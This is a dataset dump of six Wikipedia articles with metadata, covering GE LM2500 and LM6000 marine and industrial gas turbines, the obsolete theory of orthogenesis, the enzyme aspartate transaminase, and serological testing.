id
int64
39
79M
url
stringlengths
31
227
text
stringlengths
6
334k
source
stringlengths
1
150
categories
listlengths
1
6
token_count
int64
3
71.8k
subcategories
listlengths
0
30
1,062,621
https://en.wikipedia.org/wiki/General%20Electric%20LM2500
The General Electric LM2500 is an industrial and marine gas turbine produced by GE Aviation. The LM2500 is a derivative of the General Electric CF6 aircraft engine. As of 2004, the U.S. Navy and at least 29 other navies had used a total of more than one thousand LM2500/LM2500+ gas turbines to power warships. Other uses include hydrofoils, hovercraft and fast ferries. In 2012, GE developed an FPSO version to serve the oil and gas industry's demand for a lighter, more compact version to generate electricity and drive compressors to send natural gas through pipelines. Design and development The LM2500 was first used on the US Navy in 1969, after the original FT-4 gas turbines experienced many technical problems. Later, they were used in US Navy warships in the of destroyers and the related , which were constructed from 1970. In this configuration it was rated to . This configuration was subsequently used into the 1980s in the s, and s. It was also used by one of People's Republic of China's Type 052 Luhu Class Missile Destroyer (Harbin 112) acquired before the embargo. The LM2500 was uprated to for the s, which were initiated in the 1980s and started to see service in the early 1990s, and the T-AOE-6 class of fast combat tanker. In 2001 the LM2500 (20 MW) was installed in a sound-proof capsule in the South African Navy (Meko A-200 SAN) frigates as part of a CODAG propulsion system with two MTU 16V 1163 TB93 Propulsion Diesels. The current generation was uprated in the late 1990s to over . LM2500 installations place the engine inside a metal container for sound and heat isolation from the rest of the machinery spaces. This container is very near the size of a standard intermodal shipping container – but not the same, the engine size very slightly exceeds those dimensions. The air intake ducting may be designed and shaped appropriately for easy removal of the LM2500 from their ships. The LM2500+ is an evolution of the LM2500, delivering up to or 28.6 MW of electric energy when combined with an electrical generator. Two of such turbo-generators have been installed in the superstructure near the funnel of Queen Mary 2, the world's largest transatlantic ocean liner, for additional electric energy for the liner to reach higher sea speeds.. Celebrity Cruises uses two LM2500+ engines in their s in a COGAS cycle (actually COGES, as the turbines generate electricity rather than driving the shafts directly). The LM2500 is license-built in India by Hindustan Aeronautics Limited; in Italy by Avio Aero; and in Japan by IHI Corporation. (Subsequent to the February 2024 reporting of an IHI company whistleblower; On April 24, 2024, IHI announced that investigation was underway by Japan's Ministry of Land, Infrastructure, Transport and Tourism of its subsidiary, IHI Power Systems Co., which had falsified its engine data since 2003, impacting over 4,000 engines globally.) The LM2500/LM2500+ can often be found as turbine part of CODAG, CODOG, CODLAG propulsion systems or in pairs as powerplants for COGAG systems. Applications Aircraft carrier: (Italian Navy) (Italian Navy) (Royal Thai Navy) (Spanish Navy) (Indian Navy) Amphibious assault ship: (United States Navy) (Royal Australian Navy) (Spanish Navy) (United States Navy) Cruiser: (United States Navy) Destroyer: (United States Navy) (Royal Australian Navy) (Japan Maritime Self-Defense Force) (Italian Navy) (Republic of Korea Navy) (Republic of China Navy) (Republic of Korea Navy) (Japan Maritime Self-Defense Force) (United States Navy) Type 052 destroyer (People's Liberation Army Navy) Project 18 (Indian Navy) Frigate: (Royal Australian Navy) (Spanish Navy) (Royal Australian Navy, Royal New Zealand Navy) (German Navy) (Turkish Navy) (Royal Thai Navy) (German Navy) (German Navy) (Republic of China Navy) (United States Navy) FREMM multipurpose frigate (French Navy, Italian Navy, Royal Moroccan Navy) (Royal Norwegian Navy) (Royal Canadian Navy) (French Navy, Italian Navy) (Hellenic Navy) (Pakistan Navy) (Royal Thai Navy) (Indian Navy) (United States Navy) (German Navy) (Spanish Navy) (Indian Navy) (South African Navy) (Portuguese Navy) (Republic of Korea Navy) (Turkish Navy) Fast Combat Support Ship: (United States Navy) Maritime Prepositioning Force: (United States Navy) Littoral combat ship: (United States Navy) Corvette: (Finnish Navy) (Royal Danish Navy) (Israeli Navy) (Philippine Navy) (Brazilian Navy) (Turkish Navy) Next Generation Missile Vessels (Indian Navy) Maritime Security Cutter, Large: (United States Coast Guard) Fast Attack Patrol boat (United States Navy) (Indonesian Navy)Passenger Ship: Queen Mary 2'' ocean liner (Cunard Line) (Holland America Line) (Princess Cruises) (Princess Cruises) (Celebrity Cruises) (Royal Caribbean International) Variants The LM2500 is available in 3 different versions: The LM2500 delivers with a thermal efficiency of 37 percent at ISO conditions. When coupled with an electric generator, it delivers 24 MW of electricity at 60 Hz with a thermal efficiency of 36 percent at ISO conditions. The improved, 3rd generation, LM2500+ version of the turbine delivers with a thermal efficiency of 39 percent at ISO conditions. When coupled with an electric generator, it delivers 29 MW of electricity at 60 Hz with a thermal efficiency of 38 percent at ISO conditions. The latest, 4th generation, LM2500+G4 version was introduced in November 2005 and delivers 47,370 shp (35,320 kW) with a thermal efficiency of 39.3 percent at ISO conditions. Derivatives The GE TM2500 is derived from the LM2500, and mounted on a trailer that makes it possible to move it to wherever 30 MW of temporary electricity generation is required. It can be installed and commissioned in 11 days. Specification The basic LM2500 has a single shaft gas generator derived from the CF6, comprising a 16 stage compressor driven by a two stage air-cooled HP turbine. The combustion chamber is annular. Shaft power is generated by a 6-stage power turbine mounted in the gas generator exhaust stream. Additional power is obtained from the LM2500+ by the addition of a zero stage to the compressor, making 17 stages in all. Specifications for three models of LM2500 series gas turbine engines: See also References External links Official GE Aviation page for LM2500 (GEAE). Official GE Aviation page for LM2500+. Official GE Aviation page for LM2500+G4. FAS information page on US Navy LM2500 usage SA Navy Valour class frigate page Power Generation plants Simple and combined cycle 50 Hz Simple and combined cycle 60 Hz Aero-derivative engines Gas turbines Marine engines
General Electric LM2500
[ "Technology" ]
1,493
[ "Marine engines", "Aero-derivative engines", "Engines", "Gas turbines" ]
1,062,901
https://en.wikipedia.org/wiki/Orthogenesis
Orthogenesis, also known as orthogenetic evolution, progressive evolution, evolutionary progress, or progressionism, is an obsolete biological hypothesis that organisms have an innate tendency to evolve in a definite direction towards some goal (teleology) due to some internal mechanism or "driving force". According to the theory, the largest-scale trends in evolution have an absolute goal such as increasing biological complexity. Prominent historical figures who have championed some form of evolutionary progress include Jean-Baptiste Lamarck, Pierre Teilhard de Chardin, and Henri Bergson. The term orthogenesis was introduced by Wilhelm Haacke in 1893 and popularized by Theodor Eimer five years later. Proponents of orthogenesis had rejected the theory of natural selection as the organizing mechanism in evolution for a rectilinear (straight-line) model of directed evolution. With the emergence of the modern synthesis, in which genetics was integrated with evolution, orthogenesis and other alternatives to Darwinism were largely abandoned by biologists, but the notion that evolution represents progress is still widely shared; modern supporters include E. O. Wilson and Simon Conway Morris. The evolutionary biologist Ernst Mayr made the term effectively taboo in the journal Nature in 1948, by stating that it implied "some supernatural force". The American paleontologist George Gaylord Simpson (1953) attacked orthogenesis, linking it with vitalism by describing it as "the mysterious inner force". Despite this, many museum displays and textbook illustrations continue to give the impression that evolution is directed. The philosopher of biology Michael Ruse notes that in popular culture, evolution and progress are synonyms, while the unintentionally misleading image of the March of Progress, from apes to modern humans, has been widely imitated. Definition The term orthogenesis (from Ancient orthós, "straight", and Ancient , "origin") was first used by the biologist Wilhelm Haacke in 1893. Theodor Eimer was the first to give the word a definition; he defined orthogenesis as "the general law according to which evolutionary development takes place in a noticeable direction, above all in specialized groups". In 1922, the zoologist Michael F. Guyer wrote: According to Susan R. Schrepfer in 1983: In 1988, Francisco J. Ayala defined progress as "systematic change in a feature belonging to all the members of a sequence in such a way that posterior members of the sequence exhibit an improvement of that feature". He argued that there are two elements in this definition, directional change and improvement according to some standard. Whether a directional change constitutes an improvement is not a scientific question; therefore Ayala suggested that science should focus on the question of whether there is directional change, without regard to whether the change is "improvement". This may be compared to Stephen Jay Gould's suggestion of "replacing the idea of progress with an operational notion of directionality". In 1989, Peter J. Bowler defined orthogenesis as: In 1996, Michael Ruse defined orthogenesis as "the view that evolution has a kind of momentum of its own that carries organisms along certain tracks". History Medieval The possibility of progress is embedded in the mediaeval great chain of being, with a linear sequence of forms from lowest to highest. The concept, indeed, had its roots in Aristotle's biology, from insects that produced only a grub, to fish that laid eggs, and on up to animals with blood and live birth. The medieval chain, as in Ramon Lull's Ladder of Ascent and Descent of the Mind, 1305, added steps or levels above humans, with orders of angels reaching up to God at the top. Pre-Darwinian The orthogenesis hypothesis had a significant following in the 19th century when evolutionary mechanisms such as Lamarckism were being proposed. The French zoologist Jean-Baptiste Lamarck (1744–1829) himself accepted the idea, and it had a central role in his theory of inheritance of acquired characteristics, the hypothesized mechanism of which resembled the "mysterious inner force" of orthogenesis. Orthogenesis was particularly accepted by paleontologists who saw in their fossils a directional change, and in invertebrate paleontology thought there was a gradual and constant directional change. Those who accepted orthogenesis in this way, however, did not necessarily accept that the mechanism that drove orthogenesis was teleological (had a definite goal). Charles Darwin himself rarely used the term "evolution" now so commonly used to describe his theory, because the term was strongly associated with orthogenesis, as had been common usage since at least 1647. His grandfather, the physician and polymath Erasmus Darwin, was both progressionist and vitalist, seeing "the whole cosmos [as] a living thing propelled by an internal vital force" towards "greater perfection". Robert Chambers, in his popular anonymously published 1844 book Vestiges of the Natural History of Creation presented a sweeping narrative account of cosmic transmutation, culminating in the evolution of humanity. Chambers included detailed analysis of the fossil record. With Darwin Ruse observed that "Progress (sic, his capitalisation) became essentially a nineteenth-century belief. It gave meaning to life—it offered inspiration—after the collapse [with Malthus's pessimism and the shock of the French Revolution] of the foundations of the past." The Baltic German biologist Karl Ernst von Baer (1792–1876) argued for an orthogenetic force in nature, reasoning in a review of Darwin's 1859 On the Origin of Species that "Forces which are not directed—so-called blind forces—can never produce order." In 1864, the Swiss anatomist Albert von Kölliker (1817–1905) presented his orthogenetic theory, heterogenesis, arguing for wholly separate lines of descent with no common ancestor. In 1884, the Swiss botanist Carl Nägeli (1817–1891) proposed a version of orthogenesis involving an "inner perfecting principle". Gregor Mendel died that same year; Nägeli, who proposed that an "idioplasm" transmitted inherited characteristics, dissuaded Mendel from continuing to work on plant genetics. According to Nägeli many evolutionary developments were nonadaptive and variation was internally programmed. Charles Darwin saw this as a serious challenge, replying that "There must be some efficient cause for each slight individual difference", but was unable to provide a specific answer without knowledge of genetics. Further, Darwin was himself somewhat progressionist, believing for example that "Man" was "higher" than the barnacles he studied. Darwin indeed wrote in his 1859 Origin of Species: In 1898, after studying butterfly coloration, Theodor Eimer (1843–1898) introduced the term orthogenesis with a widely read book, On Orthogenesis: And the Impotence of Natural Selection in Species Formation. Eimer claimed there were trends in evolution with no adaptive significance that would be difficult to explain by natural selection. To supporters of orthogenesis, in some cases species could be led by such trends to extinction. Eimer linked orthogenesis to neo-Lamarckism in his 1890 book Organic Evolution as the Result of the Inheritance of Acquired Characteristics According to the Laws of Organic Growth. He used examples such as the evolution of the horse to argue that evolution had proceeded in a regular single direction that was difficult to explain by random variation. Gould described Eimer as a materialist who rejected any vitalist or teleological approach to orthogenesis, arguing that Eimer's criticism of natural selection was common amongst many evolutionists of his generation; they were searching for alternative mechanisms, as they had come to believe that natural selection could not create new species. Nineteenth and twentieth centuries Numerous versions of orthogenesis (see table) have been proposed. Debate centred on whether such theories were scientific, or whether orthogenesis was inherently vitalistic or essentially theological. For example, biologists such as Maynard M. Metcalf (1914), John Merle Coulter (1915), David Starr Jordan (1920) and Charles B. Lipman (1922) claimed evidence for orthogenesis in bacteria, fish populations and plants. In 1950, the German paleontologist Otto Schindewolf argued that variation tends to move in a predetermined direction. He believed this was purely mechanistic, denying any kind of vitalism, but that evolution occurs due to a periodic cycle of evolutionary processes dictated by factors internal to the organism. In 1964 George Gaylord Simpson argued that orthogenetic theories such as those promulgated by Du Noüy and Sinnott were essentially theology rather than biology. Though evolution is not progressive, it does sometimes proceed in a linear way, reinforcing characteristics in certain lineages, but such examples are entirely consistent with the modern neo-Darwinian theory of evolution. These examples have sometimes been referred to as orthoselection but are not strictly orthogenetic, and simply appear as linear and constant changes because of environmental and molecular constraints on the direction of change. The term orthoselection was first used by Ludwig Hermann Plate, and was incorporated into the modern synthesis by Julian Huxley and Bernard Rensch. Recent work has supported the mechanism and existence of mutation biased adaptation, meaning that limited local orthogenesis is now seen as possible. Theories For the columns for other philosophies of evolution (i.e., combined theories including any of Lamarckism, Mutationism, Natural selection, and Vitalism), "yes" means that person definitely supports the theory; "no" means explicit opposition to the theory; a blank means the matter is apparently not discussed, not part of the theory. The various alternatives to Darwinian evolution by natural selection were not necessarily mutually exclusive. The evolutionary philosophy of the American palaeontologist Edward Drinker Cope is a case in point. Cope, a religious man, began his career denying the possibility of evolution. In the 1860s, he accepted that evolution could occur, but, influenced by Agassiz, rejected natural selection. Cope accepted instead the theory of recapitulation of evolutionary history during the growth of the embryo - that ontogeny recapitulates phylogeny, which Agassiz believed showed a divine plan leading straight up to man, in a pattern revealed both in embryology and palaeontology. Cope did not go so far, seeing that evolution created a branching tree of forms, as Darwin had suggested. Each evolutionary step was however non-random: the direction was determined in advance and had a regular pattern (orthogenesis), and steps were not adaptive but part of a divine plan (theistic evolution). This left unanswered the question of why each step should occur, and Cope switched his theory to accommodate functional adaptation for each change. Still rejecting natural selection as the cause of adaptation, Cope turned to Lamarckism to provide the force guiding evolution. Finally, Cope supposed that Lamarckian use and disuse operated by causing a vitalist growth-force substance, "bathmism", to be concentrated in the areas of the body being most intensively used; in turn, it made these areas develop at the expense of the rest. Cope's complex set of beliefs thus assembled five evolutionary philosophies: recapitulationism, orthogenesis, theistic evolution, Lamarckism, and vitalism. Other palaeontologists and field naturalists continued to hold beliefs combining orthogenesis and Lamarckism until the modern synthesis in the 1930s. Status In science The stronger versions of the orthogenetic hypothesis began to lose popularity when it became clear that they were inconsistent with the patterns found by paleontologists in the fossil record, which were non-rectilinear (richly branching) with many complications. The hypothesis was abandoned by mainstream biologists when no mechanism could be found that would account for the process, and the theory of evolution by natural selection came to prevail. The historian of biology Edward J. Larson commented that The modern synthesis of the 1930s and 1940s, in which the genetic mechanisms of evolution were incorporated, appeared to refute the hypothesis for good. As more was understood about these mechanisms it came to be held that there was no naturalistic way in which the newly discovered mechanism of heredity could be far-sighted or have a memory of past trends. Orthogenesis was seen to lie outside the methodological naturalism of the sciences. By 1948, the evolutionary biologist Ernst Mayr, as editor of the journal Evolution, made the use of the term orthogenesis taboo: "It might be well to abstain from use of the word 'orthogenesis' .. since so many of the geneticists seem to be of the opinion that the use of the term implies some supernatural force." For these and other reasons, belief in evolutionary progress has remained "a persistent heresy", among evolutionary biologists including E. O. Wilson and Simon Conway Morris, although often denied or veiled. The philosopher of biology Michael Ruse wrote that "some of the most significant of today's evolutionists are progressionists, and that because of this we find (absolute) progressionism alive and well in their work." He argued that progressionism has harmed the status of evolutionary biology as a mature, professional science. Presentations of evolution remain characteristically progressionist, with humans at the top of the "Tower of Time" in the Smithsonian Institution in Washington D.C., while Scientific American magazine could illustrate the history of life leading progressively from mammals to dinosaurs to primates and finally man. Ruse noted that at the popular level, progress and evolution are simply synonyms, as they were in the nineteenth century, though confidence in the value of cultural and technological progress has declined. The discipline of evolutionary developmental biology, however, is open to an expanded concept of heredity that incorporates the physics of self-organization. With its rise in the late 20th-early 21st centuries, ideas of constraint and preferred directions of morphological change have made a reappearance in evolutionary theory. In popular culture In popular culture, progressionist images of evolution are widespread. The historian Jennifer Tucker, writing in The Boston Globe, notes that Thomas Henry Huxley's 1863 illustration comparing the skeletons of apes and humans "has become an iconic and instantly recognizable visual shorthand for evolution." She calls its history extraordinary, saying that it is "one of the most intriguing, and most misleading, drawings in the modern history of science." Nobody, Tucker observes, supposes that the "monkey-to-man" sequence accurately depicts Darwinian evolution. The Origin of Species had only one illustration, a diagram showing that random events create a process of branching evolution, a view that Tucker notes is broadly acceptable to modern biologists. But Huxley's image recalled the great chain of being, implying with the force of a visual image a "logical, evenly paced progression" leading up to Homo sapiens, a view denounced by Stephen Jay Gould in Wonderful Life. Popular perception, however, had seized upon the idea of linear progress. Edward Linley Sambourne's Man is But a Worm, drawn for Punch's Almanack, mocked the idea of any evolutionary link between humans and animals, with a sequence from chaos to earthworm to apes, primitive men, a Victorian beau, and Darwin in a pose that according to Tucker recalls Michelangelo's figure of Adam in his fresco adorning the ceiling of the Sistine Chapel. This was followed by a flood of variations on the evolution-as-progress theme, including The New Yorkers 1925 "The Rise and Fall of Man", the sequence running from a chimpanzee to Neanderthal man, Socrates, and finally the lawyer William Jennings Bryan who argued for the anti-evolutionist prosecution in the Scopes Trial on the State of Tennessee law limiting the teaching of evolution. Tucker noted that Rudolph Franz Zallinger's 1965 "The Road to Homo Sapiens" fold-out illustration in F. Clark Howell's Early Man, showing a sequence of 14 walking figures ending with modern man, fitted the palaeoanthropological discoveries "not into a branching Darwinian scheme, but into the framework of the original Huxley diagram." Howell ruefully commented that the "powerful and emotional" graphic had overwhelmed his Darwinian text. Sliding between meanings Scientists, Ruse argues, continue to slide easily from one notion of progress to another: even committed Darwinians like Richard Dawkins embed the idea of cultural progress in a theory of cultural units, memes, that act much like genes. Dawkins can speak of "progressive rather than random ... trends in evolution". Dawkins and John Krebs deny the "earlier [Darwinian] prejudice" that there is anything "inherently progressive about evolution", but, Ruse argues, the feeling of progress comes from evolutionary arms races which remain in Dawkins's words "by far the most satisfactory explanation for the existence of the advanced and complex machinery that animals and plants possess". Ruse concludes his detailed analysis of the idea of Progress, meaning a progressionist philosophy, in evolutionary biology by stating that evolutionary thought came out of that philosophy. Before Darwin, Ruse argues, evolution was just a pseudoscience; Darwin made it respectable, but "only as popular science". "There it remained frozen, for nearly another hundred years", until mathematicians such as Fisher provided "both models and status", enabling evolutionary biologists to construct the modern synthesis of the 1930s and 1940s. That made biology a professional science, at the price of ejecting the notion of progress. That, Ruse argues, was a significant cost to "people [biologists] still firmly committed to Progress" as a philosophy. Facilitated variation Biology has largely rejected the idea that evolution is guided in any way, but the evolution of some features is indeed facilitated by the genes of the developmental-genetic toolkit studied in evolutionary developmental biology. An example is the development of wing pattern in some species of Heliconius butterfly, which have independently evolved similar patterns. These butterflies are Müllerian mimics of each other, so natural selection is the driving force, but their wing patterns, which arose in separate evolutionary events, are controlled by the same genes. See also Adaptive mutation Convergent evolution (contrastable with orthogenesis, not involving teleology) Devolution Directed evolution (in protein engineering) Directed evolution (transhumanism) Evolutionism Evolution of biological complexity History of evolutionary thought Structuralism Teleonomy Teleological argument References Sources Further reading Bateson, William (1909). "Heredity and variation in modern lights", in Darwin and Modern Science (A.C. Seward ed.) Cambridge University Press. Chapter V. Dennett, Daniel (1995). Darwin's Dangerous Idea. Simon & Schuster. . Huxley, Julian (1942). Evolution: The Modern Synthesis, London: George Allen and Unwin. Simpson, George G. (1957). Life Of The Past: Introduction to Paleontology. Yale University Press, p. 119. Wilkins, John (1997). "What is macroevolution?" 13 October 2004. External links What our most famous evolutionary cartoon gets wrong Non-Darwinian evolution History of evolutionary biology Teleology Vitalism Obsolete biology theories
Orthogenesis
[ "Biology" ]
3,993
[ "Vitalism", "Orthogenesis", "Obsolete biology theories", "Non-Darwinian evolution", "Biology theories" ]
1,063,222
https://en.wikipedia.org/wiki/General%20Electric%20LM6000
The General Electric LM6000 is a turboshaft aeroderivative gas turbine engine. The LM6000 is derived from the CF6-80C2 aircraft turbofan. It has additions and modifications designed to make it more suitable for marine propulsion, industrial power generation, and marine power generation use. These include an expanded turbine section to convert thrust into shaft power, supports and struts for mounting on a steel or concrete deck, and reworked controls packages for power generation. It has found wide use including peaking power plants, fast ferries and high speed cargo ship applications. Design and development The LM6000 provides from either end of the low-pressure rotor system, which rotates at 3,600 rpm. This twin spool design with the low pressure turbine operating at 60 Hz, the dominant electrical frequency in North America, eliminates the need for a conventional power turbine. Its high efficiency and installation flexibility make it ideal also for a wide variety of utility power generation and industrial applications, especially peaker and cogeneration plants. GE has several option packages for industrial LM6000s, including SPRINT (Spray Inter-Cooled Turbine), water injection (widely known as "NOx water"), STIG (Steam Injected Gas Turbine) technology and DLE (Dry Low Emissions) which utilizes a combustor with premixers to maximize combustion efficiency. The SPRINT option is designed to increase efficiency and power of the turbine, while the water injection, STIG and DLE are for reducing emissions. An alternative form of power augmentation is Evaporative Cooling, which is a water fogging system that sprays a fine mist of water into the inlet air before the air filters. This system is high maintenance and may be replaced by chillers in newer units. The SPRINT system injects demineralized water into the engine either upstream of the low pressure compressor or between the low pressure and high pressure compressors. The water injection system injects water into the primary or secondary fuel nozzle inputs, usually on natural gas fired engines. The GE LM6000 PC is rated to provide more than 43 MW with a thermal efficiency of around 42% LHV at ISO conditions. With options, this can be increased to around 50 MW rated power. Applications Over 1000 LM6000 gas turbines shipped and over 21 million hours of operation. Applications include power generation for combined cycle or peak power. Other applications include combined heat and power for industrial and independent power producers. See also References External links GE LM6000 website Aero-derivative engines Marine engines Gas turbines
General Electric LM6000
[ "Technology" ]
526
[ "Marine engines", "Aero-derivative engines", "Engines", "Gas turbines" ]
1,063,353
https://en.wikipedia.org/wiki/Aspartate%20transaminase
Aspartate transaminase (AST) or aspartate aminotransferase, also known as AspAT/ASAT/AAT or (serum) glutamic oxaloacetic transaminase (GOT, SGOT), is a pyridoxal phosphate (PLP)-dependent transaminase enzyme () that was first described by Arthur Karmen and colleagues in 1954. AST catalyzes the reversible transfer of an α-amino group between aspartate and glutamate and, as such, is an important enzyme in amino acid metabolism. AST is found in the liver, heart, skeletal muscle, kidneys, brain, red blood cells and gall bladder. Serum AST level, serum ALT (alanine transaminase) level, and their ratio (AST/ALT ratio) are commonly measured clinically as biomarkers for liver health. The tests are part of blood panels. The half-life of total AST in the circulation approximates 17 hours and, on average, 87 hours for mitochondrial AST. Aminotransferase is cleared by sinusoidal cells in the liver. Function Aspartate transaminase catalyzes the interconversion of aspartate and α-ketoglutarate to oxaloacetate and glutamate. L-Aspartate (Asp) + α-ketoglutarate ↔ oxaloacetate + L-glutamate (Glu) As a prototypical transaminase, AST relies on PLP (Vitamin B6) as a cofactor to transfer the amino group from aspartate or glutamate to the corresponding ketoacid. In the process, the cofactor shuttles between PLP and the pyridoxamine phosphate (PMP) form. The amino group transfer catalyzed by this enzyme is crucial in both amino acid degradation and biosynthesis. In amino acid degradation, following the conversion of α-ketoglutarate to glutamate, glutamate subsequently undergoes oxidative deamination to form ammonium ions, which are excreted as urea. In the reverse reaction, aspartate may be synthesized from oxaloacetate, which is a key intermediate in the citric acid cycle. Isoenzymes Two isoenzymes are present in a wide variety of eukaryotes. In humans: GOT1/cAST, the cytosolic isoenzyme derives mainly from red blood cells and heart. GOT2/mAST, the mitochondrial isoenzyme is present predominantly in liver. These isoenzymes are thought to have evolved from a common ancestral AST via gene duplication, and they share a sequence homology of approximately 45%. AST has also been found in a number of microorganisms, including E. coli, H. mediterranei, and T. thermophilus. In E. coli, the enzyme is encoded by the aspCgene and has also been shown to exhibit the activity of an aromatic-amino-acid transaminase (). Structure X-ray crystallography studies have been performed to determine the structure of aspartate transaminase from various sources, including chicken mitochondria, pig heart cytosol, and E. coli. Overall, the three-dimensional polypeptide structure for all species is quite similar. AST is dimeric, consisting of two identical subunits, each with approximately 400 amino acid residues and a molecular weight of approximately 45 kD. Each subunit is composed of a large and a small domain, as well as a third domain consisting of the N-terminal residues 3-14; these few residues form a strand, which links and stabilizes the two subunits of the dimer. The large domain, which includes residues 48-325, binds the PLP cofactor via an aldimine linkage to the ε-amino group of Lys258. Other residues in this domain – Asp 222 and Tyr 225 – also interact with PLP via hydrogen bonding. The small domain consists of residues 15-47 and 326-410 and represents a flexible region that shifts the enzyme from an "open" to a "closed" conformation upon substrate binding. The two independent active sites are positioned near the interface between the two domains. Within each active site, a couple arginine residues are responsible for the enzyme's specificity for dicarboxylic acid substrates: Arg386 interacts with the substrate's proximal (α-)carboxylate group, while Arg292 complexes with the distal (side-chain) carboxylate. In terms of secondary structure, AST contains both α and β elements. Each domain has a central sheet of β-strands with α-helices packed on either side. Mechanism Aspartate transaminase, as with all transaminases, operates via dual substrate recognition; that is, it is able to recognize and selectively bind two amino acids (Asp and Glu) with different side-chains. In either case, the transaminase reaction consists of two similar half-reactions that constitute what is referred to as a ping-pong mechanism. In the first half-reaction, amino acid 1 (e.g., L-Asp) reacts with the enzyme-PLP complex to generate ketoacid 1 (oxaloacetate) and the modified enzyme-PMP. In the second half-reaction, ketoacid 2 (α-ketoglutarate) reacts with enzyme-PMP to produce amino acid 2 (L-Glu), regenerating the original enzyme-PLP in the process. Formation of a racemic product (D-Glu) is very rare. The specific steps for the half-reaction of Enzyme-PLP + aspartate ⇌ Enzyme-PMP + oxaloacetate are as follows (see figure); the other half-reaction (not shown) proceeds in the reverse manner, with α-ketoglutarate as the substrate. Internal aldimine formation: First, the ε-amino group of Lys258 forms a Schiff base linkage with the aldehyde carbon to generate an internal aldimine. Transaldimination: The internal aldimine then becomes an external aldimine when the ε-amino group of Lys258 is displaced by the amino group of aspartate. This transaldimination reaction occurs via a nucleophilic attack by the deprotonated amino group of Asp and proceeds through a tetrahedral intermediate. As this point, the carboxylate groups of Asp are stabilized by the guanidinium groups of the enzyme's Arg386 and Arg 292 residues. Quinonoid formation: The hydrogen attached to the a-carbon of Asp is then abstracted (Lys258 is thought to be the proton acceptor) to form a quinonoid intermediate. Ketimine formation: The quinonoid is reprotonated, but now at the aldehyde carbon, to form the ketimine intermediate. Ketimine hydrolysis: Finally, the ketimine is hydrolyzed to form PMP and oxaloacetate. This mechanism is thought to have multiple partially rate-determining steps. However, it has been shown that the substrate binding step (transaldimination) drives the catalytic reaction forward. Clinical significance AST is similar to alanine transaminase (ALT) in that both enzymes are associated with liver parenchymal cells. The difference is that ALT is found predominantly in the liver, with clinically negligible quantities found in the kidneys, heart, and skeletal muscle, while AST is found in the liver, heart (cardiac muscle), skeletal muscle, kidneys, brain, and red blood cells. As a result, ALT is a more specific indicator of liver inflammation than AST, as AST may be elevated also in diseases affecting other organs, such as myocardial infarction, acute pancreatitis, acute hemolytic anemia, severe burns, acute renal disease, musculoskeletal diseases, and trauma. AST was defined as a biochemical marker for the diagnosis of acute myocardial infarction in 1954. However, the use of AST for such a diagnosis is now redundant and has been superseded by the cardiac troponins. Laboratory tests should always be interpreted using the reference range from the laboratory that performed the test. Example reference ranges are shown below: See also Alanine transaminase (ALT/ALAT/SGPT) Transaminases References Further reading External links AST - Lab Tests Online AST: MedlinePlus Medical Encyclopedia Liver function tests EC 2.6.1 Glutamate (neurotransmitter)
Aspartate transaminase
[ "Chemistry" ]
1,856
[ "Chemical pathology", "Liver function tests" ]
1,063,406
https://en.wikipedia.org/wiki/Serology
Serology is the scientific study of serum and other body fluids. In practice, the term usually refers to the diagnostic identification of antibodies in the serum. Such antibodies are typically formed in response to an infection (against a given microorganism), against other foreign proteins (in response, for example, to a mismatched blood transfusion), or to one's own proteins (in instances of autoimmune disease). In either case, the procedure is simple. Serological tests Serological tests are diagnostic methods that are used to identify antibodies and antigens in a patient's sample. Serological tests may be performed to diagnose infections and autoimmune illnesses, to check if a person has immunity to certain diseases, and in many other situations, such as determining an individual's blood type. Serological tests may also be used in forensic serology to investigate crime scene evidence. Several methods can be used to detect antibodies and antigens, including ELISA, agglutination, precipitation, complement-fixation, and fluorescent antibodies and more recently chemiluminescence. Applications Microbiology In microbiology, serologic tests are used to determine if a person has antibodies against a specific pathogen, or to detect antigens associated with a pathogen in a person's sample. Serologic tests are especially useful for organisms that are difficult to culture by routine laboratory methods, like Treponema pallidum (the causative agent of syphilis), or viruses. The presence of antibodies against a pathogen in a person's blood indicates that they have been exposed to that pathogen. Most serologic tests measure one of two types of antibodies: immunoglobulin M (IgM) and immunoglobulin G (IgG). IgM is produced in high quantities shortly after a person is exposed to the pathogen, and production declines quickly thereafter. IgG is also produced on the first exposure, but not as quickly as IgM. On subsequent exposures, the antibodies produced are primarily IgG, and they remain in circulation for a prolonged period of time. This affects the interpretation of serology results: a positive result for IgM suggests that a person is currently or recently infected, while a positive result for IgG and negative result for IgM suggests that the person may have been infected or immunized in the past. Antibody testing for infectious diseases is often done in two phases: during the initial illness (acute phase) and after recovery (convalescent phase). The amount of antibody in each specimen (antibody titer) is compared, and a significantly higher amount of IgG in the convalescent specimen suggests infection as opposed to previous exposure. False negative results for antibody testing can occur in people who are immunosuppressed, as they produce lower amounts of antibodies, and in people who receive antimicrobial drugs early in the course of the infection. Transfusion medicine Blood typing is typically performed using serologic methods. The antigens on a person's red blood cells, which determine their blood type, are identified using reagents that contain antibodies, called antisera. When the antibodies bind to red blood cells that express the corresponding antigen, they cause red blood cells to clump together (agglutinate), which can be identified visually. The person's blood group antibodies can also be identified by adding plasma to cells that express the corresponding antigen and observing the agglutination reactions. Other serologic methods used in transfusion medicine include crossmatching and the direct and indirect antiglobulin tests. Crossmatching is performed before a blood transfusion to ensure that the donor blood is compatible. It involves adding the recipient's plasma to the donor blood cells and observing for agglutination reactions. The direct antiglobulin test is performed to detect if antibodies are bound to red blood cells inside the person's body, which is abnormal and can occur in conditions like autoimmune hemolytic anemia, hemolytic disease of the newborn and transfusion reactions. The indirect antiglobulin test is used to screen for antibodies that could cause transfusion reactions and identify certain blood group antigens. Immunology Serologic tests can help to diagnose autoimmune disorders by identifying abnormal antibodies directed against a person's own tissues (autoantibodies). All people have different immunology graphs. Serological surveys A 2016 research paper by Metcalf et al., amongst whom were Neil Ferguson and Jeremy Farrar, stated that serological surveys are often used by epidemiologists to determine the prevalence of a disease in a population. Such surveys are sometimes performed by random, anonymous sampling from samples taken for other medical tests or to assess the prevalence of antibodies of a specific organism or protective titre of antibodies in a population. Serological surveys are usually used to quantify the proportion of people or animals in a population positive for a specific antibody or the titre or concentrations of an antibody. These surveys are potentially the most direct and informative technique available to infer the dynamics of a population's susceptibility and level of immunity. The authors proposed a World Serology Bank (or serum bank) and foresaw "associated major methodological developments in serological testing, study design, and quantitative analysis, which could drive a step change in our understanding and optimum control of infectious diseases." In a helpful reply entitled "Opportunities and challenges of a World Serum Bank", de Lusignan and Correa observed that the In another helpful reply on the World Serum Bank, the Australian researcher Karen Coates declared that: In April 2020, Justin Trudeau formed the COVID-19 Immunity Task Force, whose mandate is to carry out a serological survey in a scheme hatched in the midst of the COVID-19 pandemic. See also Forensic serology 